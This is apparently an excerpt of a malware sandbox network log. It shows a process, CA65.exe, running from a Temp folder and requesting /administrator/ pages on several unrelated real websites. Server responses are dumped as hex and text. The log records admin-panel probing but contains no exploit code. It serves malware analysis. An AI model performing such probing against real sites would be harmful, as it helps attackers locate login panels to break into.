Dec 22, 2023 21:14:50.471259117 CET	173	OUT	GET /administrator/ HTTP/1.1 Host: vixej.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Dec 22, 2023 21:14:50.624294996 CET	148	IN	HTTP/1.1 302 Found content-length: 0 date: Fri, 22 Dec 2023 20:14:49 GMT location: https://www.hugedomains.com/domain_profile.cfm?d=vixej.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	54802	50.31.65.5	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:50.681039095 CET	180	OUT	GET /administrator/ HTTP/1.1 Host: saltdelcolom.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Dec 22, 2023 21:14:50.838907003 CET	950	IN	HTTP/1.1 301 Moved Permanently Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: text/html content-length: 707 date: Fri, 22 Dec 2023 20:14:50 GMT server: LiteSpeed location: https://saltdelcolom.com/administrator/ Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	55070	107.158.136.76	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:50.845457077 CET	181	OUT	GET /administrator/ HTTP/1.1 Host: videolifeperu.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Dec 22, 2023 21:14:51.036457062 CET	1286	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Dec 2023 20:14:50 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/5.4.41 Content-Encoding: gzip Data Raw: 37 65 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 57 79 6f 1b c7 15 ff 5f 9f 62 4c 21 25 09 70 77 49 8a 3a 78 02 b1 2c b4 06 12 d7 88 15 d4 85 61 04 c3 dd 59 72 ec bd 32 3b 14 75 d8 80 e2 34 ae e5 a4 56 03 2b 3e 22 25 3e 62 bb 6a 53 db 72 12 bb 82 05 59 5f 86 cb e3 af 7e 85 be 99 25 29 52 52 82 1a 30 09 92 cb 99 77 cc bb 7e ef cd 7f 77 f6 0a c7 4e fc 71 7a f6 cf a7 67 50 95 db 16 3a fd f1 f1 0f 4e 4e a3 88 a2 69 7f 1a 9b d6 b4 13 b3 27 d0 d9 3f cc 7e f8 01 4a a9 49 74 86 33 aa 73 4d 9b 39 15 41 91 2a e7 5e 4e d3 ea f5 ba 5a 1f 53 5d 56 d1 66 3f d2 e6 85 94 94 60 eb 3e 2a be e4 51 0d 6e 44 4a 23 05 a9 64 de b6 1c bf 78 84 80 54 36 9b 0d f9 24 2d c1 06 fc d8 84 63 38 1c f7 14 f2 69 8d ce 15 23 d3 ae c3 89 c3 95 d9 05 8f 44 90 1e fe 2b 46 38 99 e7 9a 90 9f 47 7a 15 33 9f f0 62 8d 9b ca 94 10 75 48 c6 59 e5 e3 f7 95 69 d7 f6 30 a7 65 6b 50 cc c9 99 22 31 2a 24 a1 57 99 6b 93 62 2a 82 b4 9e 00 07 c3 42 84 11 c7 20 8c b0 01 d5 75 52 be 48 f9 25 4a 14 1d 44 8a 5f 9f 63 47 18 3c 52 e0 94 5b a4 14 3c fa 57 e7 ce cf 9d f5 ab c1 fa c3 e0 de 8d d6 ee d7 c1 77 cb c1 e6 0b 78 88 35 b6 9f 06 eb bb f1 e0 e6 67 ad 95 af 82 2f fe 1d ac 6e 17 b4 90 6d a4 e0 eb 8c 7a 1c f9 4c 2f 46 b4 0b 9f d6 08 5b 50 6d ea a8 17 fc 08 2a 15 b4 70 5b e8 f1 f9 82 45 10 07 9f 74 5d a1 fb 3e 1c a0 ec 1a 0b 4b 36 66 15 ea e4 92 79 0f 1b 06 75 2a f0 54 c6 fa c5 0a 73 6b 8e 91 1b 35 4d 33 6f 82 1b 73 a9 8c 37 af a5 d4 09 f4 3e a3 d8 4a 9c c1 8e af f8 84 51 73 98 3c 63 4e 9a 7a be 4e 0d 5e cd a5 92 c9 f7 f2 55 42 2b 55 60 17 cf 03 82 59 a5 8c 63 e9 b1 74 22 3d 96 4d a4 33 d9 44 2a 3e b8 ad d8 ee a2 62 51 87 60 a6 54 18 36 28 04 35 c6 5d 2f 71 04 1f 4a be d7 5d 1e 1f 4f a4 bb 9f 54 1c 09 95 c3 42 c3 58 ec 0b b4 88 c9 91 90 2a 1f ca 2e e7 ae 9d d0 5d cb 65 10 24 d7 8b f5 05 0f 9d 33 3e 48 22 94 1c a5 3d 7e a4 e6 77 6e 91 fb ee 9d 64 fb ef 5c e6 61 b3 7b ce 7e eb 70 9a d4 e2 84 e5 3c e6 56 a8 91 3b 71 f6 a4 8d 2b 64 96 41 36 9a 2e b3 d5 0f a9 ce 5c df 35 b9 da cf 1a 04 f5 c6 f8 b4 88 2a e0 4d 31 3a 4a a6 88 69 66 a3 09 a8 d5 81 55 48 74 78 45 13 bf ef 66 9b 40 90 62 12 0d 86 51 61 c4 23 98 e7 1c b7 fb 94 bf 3c 82 73 60 dc c5 04 ce cd 51 9f 72 62 2c c9 f4 c9 8d 4e 66 a7 74 5c ce 0b e0 51 0c a2 bb 0c c0 c4 75 80 d5 21 92 ab ea ce 11 d6 23 d6 c7 d2 d9 74 f6 d7 88 55 a1 01 e1 6e a5 2a 2c ac 27 62 83 1c b9 95 50 85 16 7f 29 2c ba f1 4c d2 9b cf f7 aa 1a e1 1a 77 51 6a 1c 96 86 0f 06 bc 21 97 88 8d d2 2d d2 b4 10 29 97 91 61 1c 81 0c 28 09 6f 29 ac 4f 57 b3 8e a0 13 db 9e cb 38 b6 7a 16 e2 c9 72 d6 98 08 2d c4 16 ad 38 39 1d 2a 9a b0 7c bd 0a 5e 53 7c 0f eb 04 9c 53 67 d8 cb d7 5d 66 c8 15 89 46 6a 66 3c 34 35 14 88 ba 0e ef ca 87 bf 47 3b 7e 58 c8 fe 81 80 41 ba 3e b1 2f 00 eb 9c ce 91 03 b1 e8 5b 80 e0 24 ce 52 1f 1c 51 5a b8 d7 a0 be 67 e1 85 1c 75 a4 fb ca 96 ab 5f ec 21 dd d8 14 10 0c 7a 55 2e 0c 62 2a 49 93 49 02 b8 09 76 12 a6 88 7c ab f9 39 19 b6 61 ad 07 55 0b ef 4b f5 47 90 1d a4 15 74 22 5c 40 5b 4d f7 42 94 ca 02 88 87 29 31 36 01 72 04 b0 2b 3e 5d 24 00 fa 32 53 29 b4 2f c0 7a 05 7a 2d 6c 4b 10 ae 01 c8 03 d0 5b 44 17 89 0f d9 ab 74 51 f4 d0 c6 a1 05 bd c6 7c a8 05 83 98 b8 66 f1 23 82 2f ce 86 88 bd d4 73 67 e8 47 d9 6e 28 24 0f d5 01 Data Ascii: 7ecWyo_bL!%pwI:x,aYr2;u4V+>"%>bjSrY_~%)RR0w~wNqzgP:NNi'?~JIt3sM9A^NZS]Vf?`>QnDJ#dxT6$-c8i#D+F8Gz3buHYi0ekP"1$WkbB uRH%JD_cG<R[<Wwx5g/nmzL/F[Pmp[Et]>K6fyuTsk5M3os7>JQs<cNzN^UB+U`Yct"=M3D>bQ`T6(5]/qJ]OTBX.]e$3>H"=~wnd\a{~p<V;q+dA6.\5M1:JifUHtxEf@bQa#<s`Qrb,Nft\Qu!#tUn,'bP),LwQj!-)a(o)OW8zr-89\|^S\|Sg]fFjf<45G;~XA>/[$RQZgu_!zU.bIIv\|9aUKGt"\@[MB)16r+>]$2S)/zz-lK[DtQ\|f#/sgGn($
Dec 22, 2023 21:14:51.036560059 CET	989	IN	Data Raw: 26 2c 03 6c 06 63 b4 94 34 29 32 4b 6d e2 a3 53 a4 8e 3e 72 6d ec 44 12 72 21 71 46 b6 a2 41 23 92 79 8b 70 48 b1 7e 2a 29 fb 55 10 c2 4e 6a 22 91 4e c3 27 93 11 dd 07 9c aa 7f 02 13 83 e3 2c ed 07 0b 9a b6 28 67 34 0a 90 31 66 66 bb 8d 6d 72 f2 Data Ascii: &,lc4)2KmS>rmDr!qFA#ypH~*)UNj"N',(g41ffmrPt<H,.5:9tJ%R6%yEZwmTJ1a 9#o9[D~0inKd0ryEJ5l6W7WKw66(X}\|7O?
Dec 22, 2023 21:14:51.056411982 CET	240	OUT	GET /administrator/index.php HTTP/1.1 Host: videolifeperu.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://videolifeperu.com/administrator/
Dec 22, 2023 21:14:51.248764992 CET	1286	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/5.4.41 Content-Encoding: gzip Data Raw: 37 65 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 57 79 6f 1b c7 15 ff 5f 9f 62 4c 21 25 09 70 77 49 8a 3a 78 02 b1 2c b4 06 12 d7 88 15 d4 85 61 04 c3 dd 59 72 ec bd 32 3b 14 75 d8 80 e2 34 ae e5 a4 56 03 2b 3e 22 25 3e 62 bb 6a 53 db 72 12 bb 82 05 59 5f 86 cb e3 af 7e 85 be 99 25 29 52 52 82 1a 30 09 92 cb 99 77 cc bb 7e ef cd 7f 77 f6 0a c7 4e fc 71 7a f6 cf a7 67 50 95 db 16 3a fd f1 f1 0f 4e 4e a3 88 a2 69 7f 1a 9b d6 b4 13 b3 27 d0 d9 3f cc 7e f8 01 4a a9 49 74 86 33 aa 73 4d 9b 39 15 41 91 2a e7 5e 4e d3 ea f5 ba 5a 1f 53 5d 56 d1 66 3f d2 e6 85 94 94 60 eb 3e 2a be e4 51 0d 6e 44 4a 23 05 a9 64 de b6 1c bf 78 84 80 54 36 9b 0d f9 24 2d c1 06 fc d8 84 63 38 1c f7 14 f2 69 8d ce 15 23 d3 ae c3 89 c3 95 d9 05 8f 44 90 1e fe 2b 46 38 99 e7 9a 90 9f 47 7a 15 33 9f f0 62 8d 9b ca 94 10 75 48 c6 59 e5 e3 f7 95 69 d7 f6 30 a7 65 6b 50 cc c9 99 22 31 2a 24 a1 57 99 6b 93 62 2a 82 b4 9e 00 07 c3 42 84 11 c7 20 8c b0 01 d5 75 52 be 48 f9 25 4a 14 1d 44 8a 5f 9f 63 47 18 3c 52 e0 94 5b a4 14 3c fa 57 e7 ce cf 9d f5 ab c1 fa c3 e0 de 8d d6 ee d7 c1 77 cb c1 e6 0b 78 88 35 b6 9f 06 eb bb f1 e0 e6 67 ad 95 af 82 2f fe 1d ac 6e 17 b4 90 6d a4 e0 eb 8c 7a 1c f9 4c 2f 46 b4 0b 9f d6 08 5b 50 6d ea a8 17 fc 08 2a 15 b4 70 5b e8 f1 f9 82 45 10 07 9f 74 5d a1 fb 3e 1c a0 ec 1a 0b 4b 36 66 15 ea e4 92 79 0f 1b 06 75 2a f0 54 c6 fa c5 0a 73 6b 8e 91 1b 35 4d 33 6f 82 1b 73 a9 8c 37 af a5 d4 09 f4 3e a3 d8 4a 9c c1 8e af f8 84 51 73 98 3c 63 4e 9a 7a be 4e 0d 5e cd a5 92 c9 f7 f2 55 42 2b 55 60 17 cf 03 82 59 a5 8c 63 e9 b1 74 22 3d 96 4d a4 33 d9 44 2a 3e b8 ad d8 ee a2 62 51 87 60 a6 54 18 36 28 04 35 c6 5d 2f 71 04 1f 4a be d7 5d 1e 1f 4f a4 bb 9f 54 1c 09 95 c3 42 c3 58 ec 0b b4 88 c9 91 90 2a 1f ca 2e e7 ae 9d d0 5d cb 65 10 24 d7 8b f5 05 0f 9d 33 3e 48 22 94 1c a5 3d 7e a4 e6 77 6e 91 fb ee 9d 64 fb ef 5c e6 61 b3 7b ce 7e eb 70 9a d4 e2 84 e5 3c e6 56 a8 91 3b 71 f6 a4 8d 2b 64 96 41 36 9a 2e b3 d5 0f a9 ce 5c df 35 b9 da cf 1a 04 f5 c6 f8 b4 88 2a e0 4d 31 3a 4a a6 88 69 66 a3 09 a8 d5 81 55 48 74 78 45 13 bf ef 66 9b 40 90 62 12 0d 86 51 61 c4 23 98 e7 1c b7 fb 94 bf 3c 82 73 60 dc c5 04 ce cd 51 9f 72 62 2c c9 f4 c9 8d 4e 66 a7 74 5c ce 0b e0 51 0c a2 bb 0c c0 c4 75 80 d5 21 92 ab ea ce 11 d6 23 d6 c7 d2 d9 74 f6 d7 88 55 a1 01 e1 6e a5 2a 2c ac 27 62 83 1c b9 95 50 85 16 7f 29 2c ba f1 4c d2 9b cf f7 aa 1a e1 1a 77 51 6a 1c 96 86 0f 06 bc 21 97 88 8d d2 2d d2 b4 10 29 97 91 61 1c 81 0c 28 09 6f 29 ac 4f 57 b3 8e a0 13 db 9e cb 38 b6 7a 16 e2 c9 72 d6 98 08 2d c4 16 ad 38 39 1d 2a 9a b0 7c bd 0a 5e 53 7c 0f eb 04 9c 53 67 d8 cb d7 5d 66 c8 15 89 46 6a 66 3c 34 35 14 88 ba 0e ef ca 87 bf 47 3b 7e 58 c8 fe 81 80 41 ba 3e b1 2f 00 eb 9c ce 91 03 b1 e8 5b 80 e0 24 ce 52 1f 1c 51 5a b8 d7 a0 be 67 e1 85 1c 75 a4 fb ca 96 ab 5f ec 21 dd d8 14 10 0c 7a 55 2e 0c 62 2a 49 93 49 02 b8 09 76 12 a6 88 7c ab f9 39 19 b6 61 ad 07 55 0b ef 4b f5 47 90 1d a4 15 74 22 5c 40 5b 4d f7 42 94 ca 02 88 87 29 31 36 01 72 04 b0 2b 3e 5d 24 00 fa 32 53 29 b4 2f c0 7a 05 7a 2d 6c 4b 10 ae 01 c8 03 d0 5b 44 17 89 0f d9 ab 74 51 f4 d0 c6 a1 05 bd c6 7c a8 05 83 98 b8 66 f1 23 82 2f ce 86 88 bd d4 73 67 e8 47 d9 6e 28 24 0f d5 01 Data Ascii: 7ecWyo_bL!%pwI:x,aYr2;u4V+>"%>bjSrY_~%)RR0w~wNqzgP:NNi'?~JIt3sM9A^NZS]Vf?`>QnDJ#dxT6$-c8i#D+F8Gz3buHYi0ekP"1$WkbB uRH%JD_cG<R[<Wwx5g/nmzL/F[Pmp[Et]>K6fyuTsk5M3os7>JQs<cNzN^UB+U`Yct"=M3D>bQ`T6(5]/qJ]OTBX.]e$3>H"=~wnd\a{~p<V;q+dA6.\5M1:JifUHtxEf@bQa#<s`Qrb,Nft\Qu!#tUn,'bP),LwQj!-)a(o)OW8zr-89\|^S\|Sg]fFjf<45G;~XA>/[$RQZgu_!zU.bIIv\|9aUKGt"\@[MB)16r+>]$2S)/zz-lK[DtQ\|f#/sgGn($
Dec 22, 2023 21:14:51.248785973 CET	989	IN	Data Raw: 26 2c 03 6c 06 63 b4 94 34 29 32 4b 6d e2 a3 53 a4 8e 3e 72 6d ec 44 12 72 21 71 46 b6 a2 41 23 92 79 8b 70 48 b1 7e 2a 29 fb 55 10 c2 4e 6a 22 91 4e c3 27 93 11 dd 07 9c aa 7f 02 13 83 e3 2c ed 07 0b 9a b6 28 67 34 0a 90 31 66 66 bb 8d 6d 72 f2 Data Ascii: &,lc4)2KmS>rmDr!qFA#ypH~*)UNj"N',(g41ffmrPt<H,.5:9tJ%R6%yEZwmTJ1a 9#o9[D~0inKd0ryEJ5l6W7WKw66(X}\|7O?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	55067	23.229.226.96	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:50.851255894 CET	184	OUT	GET /administrator/ HTTP/1.1 Host: derrickandbriggs.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Dec 22, 2023 21:14:51.232053041 CET	1286	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:50 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://derrickandbriggs.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 32 30 63 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 44 65 72 72 69 63 6b 20 26 61 6d 70 3b 20 42 72 69 67 67 73 2c 20 4c 4c 50 44 65 72 72 69 63 6b 20 26 61 6d 70 3b 20 42 72 69 67 67 73 2c 20 4c 4c 50 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 64 65 72 72 69 63 6b 61 6e 64 62 72 69 67 67 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6b 61 6e 64 69 6e 73 6b 79 2f 73 74 79 6c 65 2e 63 73 73 3f 76 3d 33 2e 32 22 20 2f 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 68 74 6d 6c 35 73 68 69 76 2f 33 2e 37 2e 33 2f 68 74 6d 6c 35 73 68 69 76 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 34 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 44 65 72 72 69 63 6b 20 26 61 6d 70 3b 20 42 72 69 67 67 73 2c 20 4c 4c 50 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 Data Ascii: 20c3<!doctype html><html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1"><title>Page not found - Derrick & Briggs, LLPDerrick & Briggs, LLP</title><link rel="stylesheet" type="text/css" media="all" href="http://derrickandbriggs.com/wp-content/themes/kandinsky/style.css?v=3.2" />...[if lt IE 9]> <script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.js"></script> <![endif]-->... This site is optimized with the Yoast SEO plugin v14.3 - https://yoast.com/wordpress/plugins/seo/ --><meta name="robots" content="noindex, follow" /><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - Derrick & Briggs, LLP" /><meta property="og:site_name"
Dec 22, 2023 21:14:51.234384060 CET	1286	IN	Data Raw: 63 6f 6e 74 65 6e 74 3d 22 44 65 72 72 69 63 6b 20 26 61 6d 70 3b 20 42 72 69 67 67 73 2c 20 4c 4c 50 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 Data Ascii: content="Derrick & Briggs, LLP" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://derrickandbriggs.com/#website","url":"http://derrickandbriggs.com
Dec 22, 2023 21:14:51.234405994 CET	1286	IN	Data Raw: 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 74 2e 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 2c 61 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 Data Ascii: a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){
Dec 22, 2023 21:14:51.234448910 CET	1286	IN	Data Raw: 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 6e 2c 21 31 29 29 3a 28 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 6e 29 2c 61 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 72 65 61 64 79 73 74 61 74 65 Data Ascii: EventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source\|\|{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)
Dec 22, 2023 21:14:51.234483957 CET	1286	IN	Data Raw: 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 63 6e 2d 70 75 62 6c 69 63 2d 63 73 73 27 20 20 68 72 65 66 3d 27 2f 2f Data Ascii: type='text/css' media='all' /><link rel='stylesheet' id='cn-public-css' href='//derrickandbriggs.com/wp-content/plugins/connections/assets/dist/css/frontend.css?ver=9.6-1591806377' type='text/css' media='all' /><link rel='stylesheet' id='cn
Dec 22, 2023 21:14:51.234524965 CET	1286	IN	Data Raw: 70 74 27 20 73 72 63 3d 27 68 74 74 70 3a 2f 2f 64 65 72 72 69 63 6b 61 6e 64 62 72 69 67 67 73 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 6d 69 67 72 61 74 65 2e 6d 69 6e 2e 6a 73 3f 76 Data Ascii: pt' src='http://derrickandbriggs.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script><link rel='https://api.w.org/' href='http://derrickandbriggs.com/wp-json/' /><link rel="EditURI" type="application/rsd+xml" title="RSD" href
Dec 22, 2023 21:14:51.236247063 CET	1078	IN	Data Raw: 36 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 31 35 36 22 3e Data Ascii: 6" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-156"><a href="http://derrickandbriggs.com/derrick/">Gary W. Derrick</a></li><li id="menu-item-155" class="menu-item menu-item-type-post_type menu-item-object-page me
